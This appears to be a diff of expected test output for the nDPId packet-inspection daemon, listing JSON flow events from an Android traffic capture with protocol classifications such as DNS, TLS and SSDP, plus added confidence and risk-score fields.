+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866407,"flow_last_seen":1582454866538,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454792980,"flow_last_seen":1582454853081,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1530,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866448,"flow_last_seen":1582454868606,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
-00710{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}}
-00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454865802,"flow_last_seen":1582454866026,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00654{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
+00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
